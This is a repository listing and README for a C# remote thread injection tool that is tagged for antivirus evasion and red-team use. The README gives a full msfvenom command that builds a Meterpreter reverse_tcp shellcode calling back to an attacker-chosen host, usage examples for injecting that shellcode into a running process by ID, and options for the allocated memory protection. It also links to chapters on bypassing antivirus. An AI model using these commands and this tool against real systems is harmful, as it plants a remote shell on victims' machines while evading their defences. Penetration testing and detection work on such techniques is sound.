https://github.com/damonmohammadbagher/nativepayload_tid
Remote Thread Injection by C# Delegate
https://github.com/damonmohammadbagher/nativepayload_tid
antivirus antivirus-evasion delegate pentesting process-injection redteam
Last synced: 5 months ago
JSON representation
Remote Thread Injection by C# Delegate
- Host: GitHub
- URL: https://github.com/damonmohammadbagher/nativepayload_tid
- Owner: DamonMohammadbagher
- Created: 2021-02-21T15:04:11.000Z (over 4 years ago)
- Default Branch: main
- Last Pushed: 2023-06-05T23:58:47.000Z (over 2 years ago)
- Last Synced: 2025-04-19T17:16:41.919Z (6 months ago)
- Topics: antivirus, antivirus-evasion, delegate, pentesting, process-injection, redteam
- Language: C#
- Homepage:
- Size: 201 KB
- Stars: 7
- Watchers: 1
- Forks: 5
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# NativePayload_TId
Remote Thread Injection by C# Delegate
-----------------------
Related Links for "Mitre ATT&CK":
Process Injection: Portable Executable Injection ==> https://attack.mitre.org/techniques/T1055/002/
Process Injection: Dynamic-link Library Injection ==> https://attack.mitre.org/techniques/T1055/001/
--------------------------
Your Payload Should be Msfvenom Payload ...
msfvenom –platform windows –arch x86_64 -p windows/x64/meterpreter/reverse_tcp lhost=w.x.y.z -f c > payload.txt
-------------------------
Code1: NativePayload_TId.exe [TPID] [PAYLOAD]
Code2: NativePayload_TIdnt.exe [TPID] [PAYLOAD]
EXAMPLE: NativePayload_TId.exe 2452 "FC,48,83,00,..."
EXAMPLE: NativePayload_TIdnt.exe 2452 "FC,48,83,00,..."
------------------------------------------------
Article [1]: https://damonmohammadbagher.github.io/Posts/11Feb2021x.html
Article [2]: https://www.linkedin.com/pulse/bypassing-anti-virus-creating-remote-thread-target-mohammadbagher
step by step => Chapter 14 : C# Delegate & Remote Thread Injection Technique (Part2)
https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/blob/master/CH14/Bypassing%20Anti%20Viruses%20by%20C%23.NET%20Programming%20Chapter%2014%20-Part2.pdf
------------------------------------------------
online eBook, (chapters): https://damonmohammadbagher.github.io/Posts/ebookBypassingAVsByCsharpProgramming/
------------------------------------------------
------------------------------------------------
Code1 step1: NativePayload_TId2.exe [TPID] [PAYLOAD]
Code2 step2: NativePayload_TId3.exe [TPID] [VAx-addr or VirtualAllocEx Address from step1]
EXAMPLE: NativePayload_TId2.exe 2452 "FC,48,83,00,..."
EXAMPLE: NativePayload_TId3.exe 2452 1bfc0190000
step by step => Chapter 14 : C# Delegate & Remote Thread Injection Technique (Part3)
https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/blob/master/CH14/Bypassing%20Anti%20Viruses%20by%20C%23.NET%20Programming%20Chapter%2014%20-Part3.pdf
------------------------------------------------
NativePayload_TImd.exe [steps 1 or 2] [delay 2000] [MemoryProtection/mode 0 or 1] [TPID 4716] [payload fc,48,..]
example: NativePayload_TImd.exe 1 2000 0 4716 fc,48,56,...
example: NativePayload_TImd.exe 2 6721 1 4716 fc,48,56,...
step = 1 you will have 4 steps (default)
step = 2 you will have 28 steps
MemoryProtection = 0 API::VirtualAllocEx set to MemoryProtection.ExecuteReadWrite
MemoryProtection = 1 API::VirtualAllocEx set to MemoryProtection.Execute
step by step => Chapter 14 : C# Delegate & Remote Thread Injection Technique (Part3)
https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/blob/master/CH14/Bypassing%20Anti%20Viruses%20by%20C%23.NET%20Programming%20Chapter%2014%20-Part3.pdf
